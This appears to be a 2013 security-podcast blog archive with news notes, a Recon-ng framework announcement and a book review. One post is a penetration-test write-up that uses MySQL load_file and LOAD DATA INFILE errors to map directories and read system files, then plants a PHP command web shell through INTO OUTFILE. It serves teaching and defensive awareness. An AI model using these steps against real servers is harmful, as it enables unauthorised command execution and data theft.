January 2013 Archives
After playing a little "Five Questions with PaulDotCom" (three, sir!) with tech segment guest Alissa Torres, Paul started off with a quote from Dr. Dan Geer that the guys basically resolved down to "Who cares about security?" Geer's quote is: "When those that can make the changes to improve security are not those that impacted by the effect of poor security, you will basically get status quo and no security improvement." or as Jack puts it, if my decisions on security don't bite me in the ass, I'm probably not going to make the best possible decisions. They also took this into the area of application security and who cares about it there. First, we have the developers who are being paid to write code and get the software out the door. Then we have the company paying the developers. Their concern is getting the software out the door and selling it. Then we have the customers who purchase the software and just want it to work. Where are the security decisions in this cycle?
Google also seems to have added a new feature. In Google Images, now you'll see a camera icon to the right of the search bar. If you enter a URL to an image or upload an image, Google will find all the places where that image has been used. Somewhere, Mantei Te'o screams "Where were you when I needed you three years ago, Google!!"
So Barracuda Networks has a wide-open back door to their device. It's always kind of funny, in a bad way, when security companies have poor security practices in place. It's another example of "do as we say, not as we do". A researcher was able to find that he could connect to the device's MySQL database with a username of "product" and no password! C'mon man! At a minimum, put a password on the thing. Even if it is shared internally within Barracuda, that's at least a little bit better. As Jack talked about from his days supporting customers on products, it's understandable to have some sort of back door. Customers do sometimes lock themselves out and not keep backups. So when that happens, what do you tell an angry customer who has paid you thousands of dollars? "Oh sorry, you were dumb. You're screwed." No, that's not going to fly. So vendors do put in a back door. But if you're going to have a master key to all the systems, don't make it so easy to get in to.
Cisco responds to the WRT54GL Linksys router hack. They're working on a fix for people being able to remotely get a root shell, but their recommendation in the meantime? Only let friends use your router. Oh yeah, with friends like these...
Have you signed up for the SANS webinar titled "Uninstall Java? Realistic Recommendation? No. Insanity? Yes!" with John Strand, Paul Asadoorian and Eric Conrad? It's coming up, this Tuesday at 2 pm EST.
Do you have all the HTTP response codes memorized? Someone is proposing a new range of 700-level codes Some that might be helpful: HTTP 725: It Works On My Machine. And I fear how often the PaulDotCom web server will return an HTTP 767. It simply reads "Drunk".
Former Dawson College graduate student, Ahmed Al-Khabaz, who was expelled for allegedly hacking the university's infrastructure, has received multiple job offers. The guys talks about the situation with a little more detail than is often reported. He found a vulnerability and reported it. So far, so good. But then a little while later, he pointed a scanner at the vulnerability that he found, presumably setting off alarms. Even worse, the noise from the scanner pointed back to him. Once he reported the vulnerability, what's he doing going back to it, and as "evil" Jack mentions, why didn't Al-Khabaz cover his tracks better when he switched his hat color? Nonetheless, lots of weirdness abounds in this story. The university overreacted (what?!? a university overreacted? never!) instead of using this as a learning opportunity. Plus, the student may have made some mistakes along the way, yet he comes out better for it. So is the lesson here to hack your way to a job? Is that what the universities are for? Umm, no. Never go after something that you don't have explicit, written permission to hack. Plus there's Paul's suggestion of punishment here, the student should have been required to work the help desk for three months. That's enough to teach anyone a good lesson.
That's it for this week. Watch the video for these stories and more!
Alissa Torres is a certified SANS Instructor and Incident Handler at Mandiant, finding evil on a daily basis. Alissa began her career in information security as a Communications Officer in the United States Marine Corps and is a graduate of University of Virginia and University of Maryland. She's on tonight to talk to us about Bulk Extractor.
At Derbycon and Hack3rCon this year, I gave talks that discussed ways of automating reconnaissance so that it doesn't have to be something penetration testers neglect due to time constraints. During those talks, I mentioned the possibility of a framework, but only released a script which automated some of the techniques that were discussed. Well, since DerbyCon, I have been hard at work developing the aforementioned framework, and now I am happy to announce the release of the Recon-ng reconnaissance framework.
Recon-ng is a true framework whose interface is modeled after the very popular and powerful Metasploit Framework. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng was built to feel like the Metasploit Framework in order to reduce the learning curve for leveraging the framework. However, Recon-ng is quite different. First and foremost, Recon-ng is written completely in Python. Finally! A framework written in Python! Now, developers and penetration testers who prefer to work in Python have an open source framework to which they can contribute. Another difference is Recon-ng's purpose. Recon-ng is not intended to compete with any existing framework, as it was designed exclusively for web-based reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, us the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!
Recon-ng is a completely modular framework. Each module is a Subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done for you. Building modules is simple and takes little more than a few minutes. While tasks, such as making web requests, can be done manually from within a module, there are benefits to using the prebuilt interfaces and convenience functions. For example, there are global settings to the framework which allow the user to specify a custom User-Agent string or enable proxying of requests. These global settings are only applied to all requests which use the prebuilt interface.
Recon-ng comes packaged with many modules and is well equipped to begin supporting your reconnaissance efforts immediately. Here is some information about the included modules, according to module type.
Auxiliary modules enhance the information that has already been stored in the database. The included modules look for known information leakage pages on hosts, conduct reverse lookups of hashed credentials, mangle names into usernames and email addresses, check whether or not an email address has been associated with a public credentials leak, and resolve hostnames to IP addresses.
Contacts modules harvest information about people that are associated with a given company and store it in the database. The included modules leverage LinkedIn and Jigsaw to harvest full names and job titles. The information gathered from the Contacts modules can be manipulated with the Auxiliary modules and used in conjunction with the Social Engineer Toolkit to produce devastating results. Recon-ng + SET, a match made in heaven.
Hosts modules harvest hosts that are associated with a given domain and store them in the database. The included modules leverage Baidu, Bing, Google, Shodan, and Yahoo search engines to enumerate internet aware hosts, and leverage DNS to brute guess hosts. The hosts gathered with the Hosts modules can assist penetration testers during the scoping process. They can also be used in conjunction with Auxiliary modules to identify known information leakage pages that contain active session IDs and authentication credentials.
Output modules create usable forms of the data stored in the database. The included modules provide the ability to create CSV and HTML reports. Whether you are looking to move data from Recon-ng to Excel, or create an appendix for a deliverable, we've got you covered.
Recon-ng was not designed to deliver shell, but what if I told you that you could gain authenticated access to an environment without sending a packet to the target network or application? Pwnedlist modules leverage the Pwnedlist.com API to retrieve full credentials of "pwned" user accounts. The included modules retrieve single account credentials, credentials for all "pwned" accounts within a domain, or information about known leaks. Imagine having multiple sets of legitimate credentials for a VPN or web application prior to a penetration test even beginning. That's power that simply cannot be denied.
So there you have it. The Recon-ng framework. The repository is located here and the Usage and Development Guides are located on the wiki here. Clone it, use it, love it, fork it, and contribute to it. I do not consider myself a "true" developer, but I love to code, so I gave it my best shot. I welcome any and all expertise in improving the project and making it more useful to the community. Enjoy!
Join me for SEC542: Web App Penetration Testing and Ethical Hacking at SANS Monterey 2013!
Monterey, CA | Fri Mar 22 - Wed Mar 27, 2013
On January 12, 2013, The Department of Homeland Security recommended that organizations stop using Java and uninstall Java throughout our organizations. The problem is, many organizations use Java as a regular, if not critical, part of their IT infrastructure. Sadly, it is the #1 language used in application development, with over 28% of all programs currently running within organizations. So Java is everywhere throughout our infrastructures and we are simply recommending to uninstall it? Sure, over the past few weeks there have been more than a few new 0-days for Java, but, as info sec pros we need to come up with better recommendations than simply uninstalling an app that is required for so many.
Every time we say things like "Don't use IE!! Uninstall Adobe Acrobat!! Uninstall Java!!" we get a little further down the path of total irrelevance to management and the rest of the IT community. So, to combat this, we are going to be doing the first in a monthly series of webcasts.
In this webcast we will be covering a number of ways to secure Java in your environment. From different web filtering tricks to some pretty cool GPO kung-fu from Carlos. Rather than simply saying uninstall Java we are going to do our best to provide you with mitigating controls to manage risk, rather than pretend it can be eliminated.
This webcast will be this Tuesday the 29th at 2 PM EST. Check it out here.
See you then.
Paul also got a little worked up over an article where the author compared selling vulnerabilities to shooting someone with a gun. In the article, the quote: "If I take a gun and ship it overseas to some guy in the Middle East and he uses it to go after American troops - it's the same concept," About the only thing this quote does is jumps on the current hysteria surrounding guns. Why not say selling vulnerabilities is the same thing as Kim an Kanye having a baby? It's the same thing as a guy taking drugs so he can pedal a bicycle faster? It's about as accurate. If you get shot with a gun, every single human is going to get hurt or worse. That's just a fact of nature. However a 0day vulnerability is either harmless or would not even exist in the first place if developers started writing better code. If you don't ever interact with any Java code, a Java 0day will not affect you. So no, guns and computer vulnerabilities are not the same thing.
The guys also talked about a couple researchers and how they were able to fuzz the remote authentication system of a hospital x-ray machine and then get access to anything they wanted. Just as previous demonstrations have showed that you can hack an insulin pump or even someone's pacemaker shows that the medical and medical device field have a long way to go toward incorporating a security mindset.
Want to make a little cash on the side and have some familiarity with hacking Adobe products or Internet Explorer? A bug bounty program is offering $7,000 for new vulnerabilities on each. Have at it.
Lastly, this was probably our favorite story of the week that explains why it's a good idea to proactively check your logs. According to the Verizon Risk Team Security Report, one company checked their logs and found a long-term and frequent open VPN connection to China. At first, they believed someone was infected with malware, as the connection was always to the same machine. However, upon further investigation, there was no malware. The connection was intentional. One of their employees had found a way to outsource his own job to China! Instead of developing code, he'd do some shopping on eBay, some status updates on Facebook and enjoy cat videos. However, a couple other ironies stuck out about this guy. He was frequently commended for writing great, clean code and completing projects in a very timely manner. He was seen as one of the best employees in the firm. Additionally, he was able to defeat his company's two-factor authentication requirement by sending his RSA token to China via Fed-Ex. Our take on this? This man clearly needs to be promoted to management. He has some serious management potential.
And if you've made it this far, as we talked about on the show, please follow Jack Daniel on twitter for some daily enlightenment.
The scenario goes like this. I found a Windows 7 machine running a MySQL database configured with a username of "root" and a password of "root". In my experience, when a default configuration like this is found, the database usually ends up being empty and unused, hence the neglect. As was the case here. Since MySQL doesn't have native ability to run system commands through the database, many penetration testers walk away at this point. However, MySQL access can be used to do so much more. With functions such as "load_file", "INTO OUTFILE", and "INTO DUMPFILE", we can interact with the local file system even though we can't run commands. If we're lucky, the vulnerable server is also running a web server with some sort of server side technology (PHP, .NET, JSP, etc.) so we can use the aforementioned functions to write a web shell to the web server and launch it through a browser.
In this scenario, the server was also running Apache and PHP, the perfect combination for compromise. But this is where things get interesting. Where do you write web shell? The document root, right? Well, where is the document root? While the default location is usually a good place to start, it wasn't that easy this time. As it turns out, the target was a proprietary server, configured by the vendor for a specific purpose. When something like this happens, you have 2 options for finding the document root: try to guess the document root, or find the configuration file for the web server that tells you where the document root is. I typically elect to look for the configuration file, as documents roots are more likely to be customized during configuration than the server itself. This is where the challenge began. The default install web server location was changed as well. I had to find another way. And this is when I stumbled upon a way to use MySQL to enumerate the directory structure. Check it out.
The MySQL "load_file" function gives a database user the ability to load files from the file system into a table, or dump them to the screen. If the given path exists, it works. If the given path doesn't exist, it fails and reports a database error. So how does this help us find directories? Well, what happens when we try to "load_file" a directory instead of a file? This is where it gets neat. When you attempt to load a directory that isn't there, you get the expected response; an error similar to when a given file doesn't exist.
mysql> SELECT load_file("C:/file_does_not_exist.txt"); ERROR 13 (HY000): Can't get stat of 'C:\file_does_not_exist.txt' (Errcode: 2) mysql> SELECT load_file("C:/dir_does_not_exist"); ERROR 13 (HY000): Can't get stat of 'C:\dir_does_not_exist' (Errcode: 2)
However, when the directory does exist, the path is legit, but there isn't any file content for MySQL to return, so we get back a NULL.
mysql> SELECT load_file("C:/"); +------------------+ | load_file("C:/") | +------------------+ | NULL | +------------------+ 1 row in set (0.20 sec)
Alas, we have a positive vs. negative reaction we can use to enumerate directories. At this point it is a little like "Dirbusting". We can guess, discover, guess again, and continue digging until we find what we are looking for, in this case the Apache "httpd.conf" file.
I was able to enumerate the "Program Files" and "Program Files (x86)" directories (validating that it was a 64-bit OS, something that might come in handy later). Since the server response header was "Apache 2.X.X (Win32)", I assumed x86 and began enumerating that directory tree. I tried the typical "Apache Software Foundation" directory next, as that is the default install path for modern versions of Apache. It was not there. After digging and guessing for a while, I shared my frustration with Tim Medin. He recommended I try using the "8.3" abbreviation for the directory name. Doh! Why didn't I think of that!? It worked beautifully.
mysql> SELECT load_file("C:/Program Files (x86)/Apache Software Foundation"); ERROR 13 (HY000): Can't get stat of 'C:\Program Files (x86)\Apache Software Foundation' (Errcode: 2) mysql> SELECT load_file("C:/Program Files (x86)/Apache~1"); +----------------------------------------------+ | load_file("C:/Program Files (x86)/Apache~1") | +----------------------------------------------+ | NULL | +----------------------------------------------+ 1 row in set (0.19 sec)
From then on it was trial and error until I reached the "httpd.conf" file. I pulled it down from the server, enumerated the document root location from it, used the "INTO OUTFILE" function to write a simple PHP web shell to the document root, and shell was had.
mysql> SELECT load_file("C:/Program Files (x86)/Apache~1/Apache2/conf"); +-----------------------------------------------------------+ | load_file("C:/Program Files (x86)/Apache~1/Apache2/conf") | +-----------------------------------------------------------+ | NULL | +-----------------------------------------------------------+ 1 row in set (0.17 sec) mysql> SELECT load_file("C:/Program Files (x86)/Apache~1/Apache2/conf/httpd.conf"); <omit> mysql> SELECT "<? passthru($_REQUEST['cmd']); ?>" INTO OUTFILE "C:/Program Files (x86)/<omit>/<omit>/htdocs/shell.php"; Query OK, 1 row affected (0.20 sec)
I know Carlos, this was only the beginning.
While this isn't a ground breaking hack, it is a pretty cool way to use something that MySQL gives you to your advantage before walking away from a MySQL server for which you have credentials or SQL Injection. As always, enjoy!
Update 01/18/13 12:45pm
After a few emails this morning and reports of the technique not working in some version of MySQL, I conducted some deeper testing of multiple MySQL servers. As it turns out, the above appears to be a bug that only existed in very old versions of MySQL. The version I was dealing with was 4.1.7. Therefore, to leverage the above technique, we are restricted to older versions of MySQL. Versions that we likely won't see often. Bummer. But there is some good news. I was talking about this with Tim Medin again, and he asked if I had tried using the "LOAD DATA INFILE" directive to do the same thing. I had not at the time, but immediately went to testing. I am happy to report that we now have an alternative for enumerating file system paths with newer versions of MySQL.
The "LOAD DATA INFILE" directive allows the database user to load a file from the file system directly into a table in the database. While this is similar to the "load_file" function, it does not allow us to output to the screen. Bummer, but it still works. The first thing you have to do is either create a new table to test with, or select one that you don't mind poisoning from the existing database. Once you do that, the process is very similar to what we did before.
Create a Table:
mysql> create table temp (id integer); Query OK, 0 rows affected (0.01 sec)
File Fail: mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etc/hostcds' INTO TABLE mysql.user; ERROR 29 (HY000): File 'c:\windows\system32\drivers\etc\hostcds' not found (Errcode: 2) File Success: mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etc/hosts' INTO TABLE mysql.user; ERROR 1261 (01000): Row 1 doesn't contain data for all columns Dir Fail: mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etccd' INTO TABLE mysql.user; ERROR 29 (HY000): File 'c:\windows\system32\drivers\etccd' not found (Errcode: 2) Dir Success: mysql> LOAD DATA INFILE 'c:/windows/system32/drivers/etc' INTO TABLE mysql.user; ERROR 29 (HY000): File 'c:\windows\system32\drivers\etc' not found (Errcode: 13)
File Fail: mysql> LOAD DATA INFILE '/etc/passwdblah' INTO TABLE mysql.user; ERROR 13 (HY000): Can't get stat of '/etc/passwdblah' (Errcode: 2) File Success: mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE mysql.user; ERROR 1062 (23000): Duplicate entry '##-' for key 'PRIMARY' Dir Fail: mysql> LOAD DATA INFILE '/etc/apache' INTO TABLE mysql.user; ERROR 13 (HY000): Can't get stat of '/etc/apache' (Errcode: 2) Dir Success: mysql> LOAD DATA INFILE '/etc/apache2' INTO TABLE mysql.user; ERROR 1085 (HY000): The file '/private/etc/apache2' must be in the database directory or be readable by all
As you can see, we still have differences in the responses from the server to work with. In Windows, it can be as subtle as a difference in error code. And in Linux, it's a more obvious error statement. These tests were performed against Windows MySQL 5.5.29 and Linux MySQL 5.5.25.
Join me for SEC542: Web App Penetration Testing and Ethical Hacking at SANS Monterey 2013!
Monterey, CA | Fri Mar 22 - Wed Mar 27, 2013
Gene and Josh talk about burnout in the infosec industry and what's being done about it. Plus Gene has a new book released that's getting rave reviews: "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win"
Hacking x-ray machines, comparing vulnerabilities to gun violence, unplugging java from a browser (in Paul's experience), making good money on bug bounties from IE and Adobe, condoms, castles, blaming PSY for additional Korean hacks and the best innovation story that we've heard in a while. Meow.
Join us for a talk on InfoSec Burnout on Episode 316 with Gene Kim, author of the recently released "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win" and Josh Corman, Director of Security Intelligence at Akamai Technologies. Sit back and enjoy the show live or participate in the live chat on our Ustream channel:
NOTE: The video will play the most recent show up until we are live!
A review of Gene Kim, Kevin Behr & George Spafford's "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win" .
The Phoenix Project should be on every entrepreneur's reading list and is a C-level executive's "Aesop's Fable on why IT matters". The book bills itself as "A Novel About IT, DevOps, and Helping Your Business Win", but its message is more fundamental: a business cannot succeed when its IT fails.
The Phoenix Project has a convincing and captivating style. So much so that I found myself at times transported back into the office via the experiences of the book's protagonist, Bill Palmer. Bill is the fictional Director of Midrange Technology Operations at an automotive parts company named "Parts Unlimited". He's a former military man who wants to do the right thing for himself, his family, and his co-workers. We catch up with him at the moment when his career is given an unexpected boost: he is called into the CEO's office and "voluntold" (a brilliant term popularized by PaulDotCom's Jack Daniels) to shepherd the life-saving project of the company, dubbed "Project Phoenix", to successful implementation. Bill is given what is essentially an opportunity to not just fail, but fail spectacularly. He's constantly fighting the battles many IT departments face: poor planning, rushed implementations, an adversarial relationship with both Security and Auditing, as well as project managers that demand their specific pet projects be everyone's main priority. Except now he's being promoted to VP of IT Operations after the last CIO and VP have been removed, putting himself in the line of fire.
While I am nowhere near a position of responsibility such as Bill's, I could completely identify with his feelings as he worked through one outage after another: frustrated, tired and annoyed at dealing with a completely avoidable problem. During the course of the book, Bill is thrown into various emergencies and IT catastrophes, only to ask himself "How did things get so out of control?" Fortunately, just like the PaulDotCom crew's favorite martial arts tales, Bill (and the reader) is shown down the path to enlightenment via the "Three Ways" by a quirky, rude and mysterious 'master' named Erik Reid.
Erik describes the Three Ways as follows:
"The First Way helps us understand how to create fast flow of work as it moves from Development into IT Operations, because that's what's between the business and the customer. The Second Way shows us how to shorten and amplify feedback loops, so we can fix quality at the source and avoid rework. And the Third Way shows us how to create a culture that simultaneously fosters experimentation, learning from failure, and understanding that repetition and practice are the prerequisites to mastery."
However, before Bill can learn the Three Ways, Erik puts Bill on the path to breaking the constant cycle of Reactive IT with a simple question: "[What] exactly, is your definition of 'work?'" It's a question that Bill initially struggles with, but is the key to his voyage of self-discovery. Bill moves through various obstacles in the book towards learning the Three Ways and the book does a great job of showcasing typical scenarios many IT workers find themselves in and how the Three Ways can keep projects and work from becoming unmanageable.
Having recently read "Visible Ops Security" by two of the three authors of "The Phoenix Project", I came away with a more comprehensive appreciation of the Visible Ops' lessons after finishing the novel. Via the book, I took the journey along with Bill, rather than feeling like I had been lectured. If you feel that your IT operations are a constant treadmill of poor planning and hurried execution, The Phoenix Project is an enjoyable 330 pages that shows us how to turn our shops from Reactive IT to helping the business win. To hear more on this topic and get more info on the book, be sure to catch Gene on Episode 316 of PaulDotCom Security Weekly at 6PM this Thursday January 17th!
This is an awesome interview with Kati Rodzon and Mike Murray from MAD Security about the psychology being social engineering engagements. Kati and Mike talk about the importance of confidence and playing a role.
Here is our newest intern's first project, presenting on Cross-Site Request Forgery. We apologize, the audio cuts out when the video cuts to the computer screen. But there is the text explanation on the show notes page, linked below.
Safe sexting, Facebook password disclosure ban, Apple causes increased crime in NYC, the Defcon documentary preview, IE 0day, Turktrust, 94% of healthcare breached, RoR vulnerable to SQLi, finding source code in version control
In this episode we discuss Facebook and IE vulnerabilities. We talk about cool Active Defense tricks and I get all up in the grill of infosec pros who recommend not using software like Java and IE to their customers.
Links for this episode:
Dr. Cole is a SANS instructor and author of several books including Hackers Beware, Hiding in Plain Site, Network Security Bible, and Insider Threat. Plus he recently released Advanced Persistent Threat (drink!).
Episode 314 (mp3)